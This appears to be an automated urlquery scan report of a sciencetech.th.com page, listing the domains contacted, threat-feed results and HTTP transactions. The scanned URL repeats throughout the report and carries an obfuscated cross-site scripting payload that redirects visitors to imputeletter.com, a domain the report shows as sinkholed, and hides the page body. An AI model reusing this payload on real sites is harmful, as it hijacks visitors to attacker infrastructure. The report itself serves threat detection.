Report - sciencetech.th.com/index.asp?PageShow="><script>window['location']['replace'](['h',%20't',%20't',%20'p',%20's',%20':',%20'/',%20'/',%20'i',%20'm',%20'p',%20'u',%20't',%20'e',%20'l',%20'e',%20't',%20't',%20'e',%20'r',%20'.',%20'c',%20'o',%20'm',%20'/',%20'0',%20'/',%20'0',%20'/',%20'0',%20'/',%20'0',%20'b',%20'c',%20'b',%20'2',%20'0',%20'b',%20'3',%20'3',%20'd',%20'0',%20'c',%20'e',%20'2',%20'0',%20'f',%20'c',%20'2',%20'6',%20'5',%20'a',%20'b',%20'a',%20'c',%20'c',%20'e',%20'9',%20'b',%20'0',%20'9',%20'8',%20'6',%20'/',%20'11/227-8796/964-98483-15685']['join']('')),document['body']['style']['opacity']=0x0;</script>

Report Overview

Submitted URL
sciencetech.th.com/index.asp?PageShow="><script>window['location']['replace'](['h',%20't',%20't',%20'p',%20's',%20':',%20'/',%20'/',%20'i',%20'm',%20'p',%20'u',%20't',%20'e',%20'l',%20'e',%20't',%20't',%20'e',%20'r',%20'.',%20'c',%20'o',%20'm',%20'/',%20'0',%20'/',%20'0',%20'/',%20'0',%20'/',%20'0',%20'b',%20'c',%20'b',%20'2',%20'0',%20'b',%20'3',%20'3',%20'd',%20'0',%20'c',%20'e',%20'2',%20'0',%20'f',%20'c',%20'2',%20'6',%20'5',%20'a',%20'b',%20'a',%20'c',%20'c',%20'e',%20'9',%20'b',%20'0',%20'9',%20'8',%20'6',%20'/',%20'11/227-8796/964-98483-15685']['join']('')),document['body']['style']['opacity']=0x0;</script>
IP
203.155.35.132
ASN
#7693 KSC Commercial Internet Co. Ltd.
Submitted
2024-05-07 20:02:14
Access
public
Website Title
Problem loading page
Final URL
about:neterror?e=nssFailure2&u=https%3A//imputeletter.com/0/0/0/0bcb20b33d0ce20fc265abacce9b0986/11/227-8796/964-98483-15685&c=UTF-8&d=The%20connection%20to%20the%20server%20was%20reset%20while%20the%20page%20was%20loading.
Tags
urlquery detections
No alerts detected

Detections

urlquery
0
Network Intrusion Detection
0
Threat Detection Systems
2

Domain Summary

Domain / FQDN	Rank	Registered	First Seen	Last Seen	Sent	Received	IP
cookiecdn.com	632322	2021-04-08	2021-04-08	2024-04-09	442 B	8.3 kB	54.230.111.85
imputeletter.com	unknown	2024-03-04	2024-03-27	2024-04-18	576 B	0 B	0.0.0.0
sciencetech.th.com	unknown	unknown	No data	No data	9.1 kB	156 kB	203.155.35.132
script.cookiewow.com	unknown	2020-07-29	2021-07-14	2024-02-29	832 B	113 kB	143.204.55.92
api.cookiewow.com	unknown	2020-07-29	2022-06-16	2024-04-18	2.2 kB	4.5 kB	52.74.172.97

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

No alerts detected

Threat Detection Systems

Public InfoSec YARA rules

No alerts detected

OpenPhish

No alerts detected

PhishTank

No alerts detected

mnemonic secure dns

No alerts detected

Quad9 DNS

Scan Date	Severity	Indicator	Alert
2024-05-07	medium	imputeletter.com	Sinkholed

ThreatFox

No alerts detected

JavaScript (1)

	URL	Size	First Seen	Last Seen
	about:neterror?e=nssFailure2&u=https%3A//imputeletter.com/0/0/0/0bcb20b33d0ce20fc265abacce9b0986/11/227-8796/964-98483-15685&c=UTF-8&d=The%20connection%20to%20the%20server%20was%20reset%20while%20the%20page%20was%20loading.	0 B	2023-03-07	2024-05-19
Pretty URL about:neterror?e=nssFailure2&u=https%3A//imputeletter.com/0/0/0/0bcb20b33d0ce20fc265abacce9b0986/11/227-8796/964-98483-15685&c=UTF-8&d=The%20connection%20to%20the%20server%20was%20reset%20while%20the%20page%20was%20loading. IP 0.0.0.0 ASN #0 Introduced by scriptElement Embedded in HTML true Observations First Seen2023-03-07 01:01:59 Last Seen2024-05-19 15:47:50 Times Seen37831123 Hash d41d8cd98f00b204e9800998ecf8427e da39a3ee5e6b4b0d3255bfef95601890afd80709 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Loading...

HTTP Transactions (15)

URL IP Response Size

sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E

203.155.35.132

20 kB

URL
sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
HTML document, ISO-8859 text, with very long lines (582), with CRLF line terminators
Size
20 kB (19592 bytes)
Hash
a88c743f9fa1bebbfdb1edc32ce65da3
b49b70ef642e11113dea479248b20f50b8377695
98f1d8361861efd21e66baf0eaac91e093b4bd69633a8f7964b7245bc9c706e1

HTTP Headers

GET /index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB; path=/
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:49 GMT
Content-Length: 19592

sciencetech.th.com/StyleSC.css

203.155.35.132

153 B

URL
sciencetech.th.com/StyleSC.css
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
ASCII text, with CRLF line terminators
Size
153 B (153 bytes)
Hash
27bef509b994cce2969442b480c2f21e
9b5479fe10ae05990c4cdb7750eb31b26753c5f8
7227397df34a7e273461b1f598c2bac9aee64e2ff0781211483bcf935d87a6d5

HTTP Headers

GET /StyleSC.css HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: text/css
Content-Encoding: gzip
Last-Modified: Fri, 27 Oct 2023 15:02:37 GMT
Accept-Ranges: bytes
ETag: "c4eecf9fe68da1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:49 GMT
Content-Length: 153

script.cookiewow.com/configs/ey3UiKz55sMpvLSeTHEXdzdi

143.204.55.92

501 B

URL
script.cookiewow.com/configs/ey3UiKz55sMpvLSeTHEXdzdi
IP
143.204.55.92:0
ASN
#16509 AMAZON-02

File type
ASCII text, with very long lines (501), with no line terminators
Size
501 B (501 bytes)
Hash
aa99c8adad37fde60b2c13e7c645a462
93a64643d620b737793ebba5f4caebc4ad059b3f
5e9ba94274b171ac719405a5e4a8dcd9cb1dc68c847e1ef29f473054de4a4e2d

HTTP Headers

GET /configs/ey3UiKz55sMpvLSeTHEXdzdi HTTP/1.1
Host: script.cookiewow.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/2 200 OK
content-type: application/javascript
content-length: 501
last-modified: Sat, 16 Jul 2022 07:01:07 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: zB0DzDKhopqpjYhaXbtRO0sbJzYiLfJ9
accept-ranges: bytes
server: AmazonS3
date: Tue, 07 May 2024 20:01:52 GMT
etag: "aa99c8adad37fde60b2c13e7c645a462"
vary: Accept-Encoding
x-cache: RefreshHit from cloudfront
via: 1.1 a6d89f7e2d55548b941f1ff5d5b3c8d4.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: 4p86kjQjrK8rTnv0ZDKIBU752xTLFDrBSSS3av4bs-3c5y4w-MIe_g==
X-Firefox-Spdy: h2

sciencetech.th.com/images/HeadFull.jpg

203.155.35.132

7.2 kB

URL
sciencetech.th.com/images/HeadFull.jpg
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2005:02:12 12:03:37], baseline, precision 8, 59x81, components 3
Size
7.2 kB (7163 bytes)
Hash
1e8ef3b9c70ca54f509da4d0d11b5b85
09858a1f6ccbd50e22ba310c87087eef32a3797e
b4559e236254260897579e031463a78ce95e8c1633a6c423f3a817cdc4e022bd

HTTP Headers

GET /images/HeadFull.jpg HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 27 Oct 2023 15:02:41 GMT
Accept-Ranges: bytes
ETag: "3ca2c4a1e68da1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:51 GMT
Content-Length: 7163

script.cookiewow.com/cwc.js

143.204.55.92

111 kB

URL
script.cookiewow.com/cwc.js
IP
143.204.55.92:0
ASN
#16509 AMAZON-02

File type
JavaScript source, Unicode text, UTF-8 text, with very long lines (65490)
Size
111 kB (111364 bytes)
Hash
8ce4f0f7c74eff8d88396fc752f044f5
d2b613d95c9036c0c4470a9aadf06b6badc20a70
bf25bd565697d76f6f1f7376f20973ceca0e5a8343b92d503058ee99e8163a18

HTTP Headers

GET /cwc.js HTTP/1.1
Host: script.cookiewow.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/2 200 OK
content-type: application/javascript
last-modified: Mon, 17 Jul 2023 03:31:06 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: Q6DKjT0i7wxfPwmpg8WsuNwpQ6mmNvl.
server: AmazonS3
content-encoding: br
date: Tue, 07 May 2024 20:01:52 GMT
etag: W/"8ce4f0f7c74eff8d88396fc752f044f5"
vary: Accept-Encoding
x-cache: RefreshHit from cloudfront
via: 1.1 a6d89f7e2d55548b941f1ff5d5b3c8d4.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: qYEOB1tkc6Pnm-QWBi7StxQKPYpuudZy0Aw_x-wprGoTQt4BDS2JYA==
X-Firefox-Spdy: h2

sciencetech.th.com/images/FBsciencetech.jpg

203.155.35.132

26 kB

URL
sciencetech.th.com/images/FBsciencetech.jpg
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=256, bps=0, PhotometricInterpretation=RGB, orientation=upper-left, width=256], baseline, precision 8, 133x132, components 3
Size
26 kB (26287 bytes)
Hash
2b736352de6d3ac273baaabe8afabc1d
6514d4f8fa6169352fb62f58fdd32bb8d9476787
e852bf97f42d2a80b2f19c5ae6d3203004d41142ec5d5659f3b49b88df690776

HTTP Headers

GET /images/FBsciencetech.jpg HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 27 Oct 2023 15:02:40 GMT
Accept-Ranges: bytes
ETag: "b953b6a1e68da1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:50 GMT
Content-Length: 27138

sciencetech.th.com/favicon.ico

203.155.35.132

1.2 kB

URL
sciencetech.th.com/favicon.ico
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Size
1.2 kB (1150 bytes)
Hash
921998e123e6a97da068a2a003a8ad00
7ee2cc599391a98437fb34eca8b5d0d123fe1ef7
41667cb8d31f585ad6ab4dde1302a4f9847915e00e3b50af4265ee9c2f7ace67

HTTP Headers

GET /favicon.ico HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 27 Oct 2023 15:02:40 GMT
Accept-Ranges: bytes
ETag: "519173a1e68da1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:53 GMT
Content-Length: 1150

sciencetech.th.com/images/Bgmain.jpg

203.155.35.132

18 kB

URL
sciencetech.th.com/images/Bgmain.jpg
IP
203.155.35.132:0
ASN
#7693 KSC Commercial Internet Co. Ltd.

File type
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2005:02:12 12:02:00], baseline, precision 8, 585x635, components 3
Size
18 kB (18519 bytes)
Hash
9142bd461607d2638adde93f788f06ca
b7d2397f5385a5b46c140ea6fcb217f0fecf5a63
5474b2f7e3770599958460942c1b0f397aba42727a4f2cdc56059a6e843ca5fa

HTTP Headers

GET /images/Bgmain.jpg HTTP/1.1
Host: sciencetech.th.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/index.asp?PageShow=%22%3E%3Cscript%3Ewindow[%27location%27][%27replace%27]([%27h%27,%20%27t%27,%20%27t%27,%20%27p%27,%20%27s%27,%20%27:%27,%20%27/%27,%20%27/%27,%20%27i%27,%20%27m%27,%20%27p%27,%20%27u%27,%20%27t%27,%20%27e%27,%20%27l%27,%20%27e%27,%20%27t%27,%20%27t%27,%20%27e%27,%20%27r%27,%20%27.%27,%20%27c%27,%20%27o%27,%20%27m%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27/%27,%20%270%27,%20%27b%27,%20%27c%27,%20%27b%27,%20%272%27,%20%270%27,%20%27b%27,%20%273%27,%20%273%27,%20%27d%27,%20%270%27,%20%27c%27,%20%27e%27,%20%272%27,%20%270%27,%20%27f%27,%20%27c%27,%20%272%27,%20%276%27,%20%275%27,%20%27a%27,%20%27b%27,%20%27a%27,%20%27c%27,%20%27c%27,%20%27e%27,%20%279%27,%20%27b%27,%20%270%27,%20%279%27,%20%278%27,%20%276%27,%20%27/%27,%20%2711/227-8796/964-98483-15685%27][%27join%27](%27%27)),document[%27body%27][%27style%27][%27opacity%27]=0x0;%3C/script%3E
Cookie: ASPSESSIONIDAQQTBQQB=ENHDHCIAMOMBIJAALGKPCDGB
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 27 Oct 2023 15:02:40 GMT
Accept-Ranges: bytes
ETag: "b07b9ea1e68da1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Tue, 07 May 2024 20:01:51 GMT
Content-Length: 18519

api.cookiewow.com/api/v1/ui_config?version=1

52.74.172.97

0 B

URL
api.cookiewow.com/api/v1/ui_config?version=1
IP
52.74.172.97:0
ASN
#16509 AMAZON-02

File type

Size
0 B (0 bytes)
Hash
d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

HTTP Headers

OPTIONS /api/v1/ui_config?version=1 HTTP/1.1
Host: api.cookiewow.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: GET
Access-Control-Request-Headers: content-type,token
Referer: http://sciencetech.th.com/
Origin: http://sciencetech.th.com
DNT: 1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/2 204 No Content
date: Tue, 07 May 2024 20:01:53 GMT
access-control-allow-credentials: true
access-control-allow-headers: Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,Keep-Alive,X-Requested-With,If-Modified-Since,X-CSRF-Token,token
access-control-allow-methods: GET,POST
access-control-allow-origin: *
access-control-expose-headers: 
access-control-max-age: 86400
cache-control: max-age=0, private, must-revalidate
x-request-id: 9bc1ae940fe6b30af44fa3d0248102ae
strict-transport-security: max-age=15724800; includeSubDomains
X-Firefox-Spdy: h2

api.cookiewow.com/api/v1/ui_config?version=1

52.74.172.97

2.4 kB

URL
api.cookiewow.com/api/v1/ui_config?version=1
IP
52.74.172.97:0
ASN
#16509 AMAZON-02

File type
JSON text data
Size
2.4 kB (2420 bytes)
Hash
a01bc168d1eaf2c92b967c07b75cee76
f3850e94d9293e51aca21a0ac435bcc6630195fd
621820593442db4f12b2f2eee5c57b5b1963fb8c5ff820db94b1b0e624ebca07

HTTP Headers

GET /api/v1/ui_config?version=1 HTTP/1.1
Host: api.cookiewow.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
token: ey3UiKz55sMpvLSeTHEXdzdi
Origin: http://sciencetech.th.com
DNT: 1
Connection: keep-alive
Referer: http://sciencetech.th.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

HTTP/2 200 OK
date: Tue, 07 May 2024 20:01:53 GMT
content-type: application/json; charset=utf-8
content-length: 2420
access-control-allow-credentials: true
access-control-allow-origin: *
access-control-expose-headers: 
cache-control: max-age=0, private, must-revalidate
x-request-id: dd9a6029d653334bd529d5c3272be952
strict-transport-security: max-age=15724800; includeSubDomains
X-Firefox-Spdy: h2

api.cookiewow.com/api/v1/page_views

52.74.172.97

0 B

URL
api.cookiewow.com/api/v1/page_views
IP
52.74.172.97:0
ASN
#16509 AMAZON-02

File type

Size
0 B (0 bytes)
Hash
d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

HTTP Headers

OPTIONS /api/v1/page_views HTTP/1.1
Host: api.cookiewow.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type,token
Referer: http://sciencetech.th.com/
Origin: http://sciencetech.th.com
DNT: 1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

HTTP/2 204 No Content
date: Tue, 07 May 2024 20:01:53 GMT
access-control-allow-credentials: true
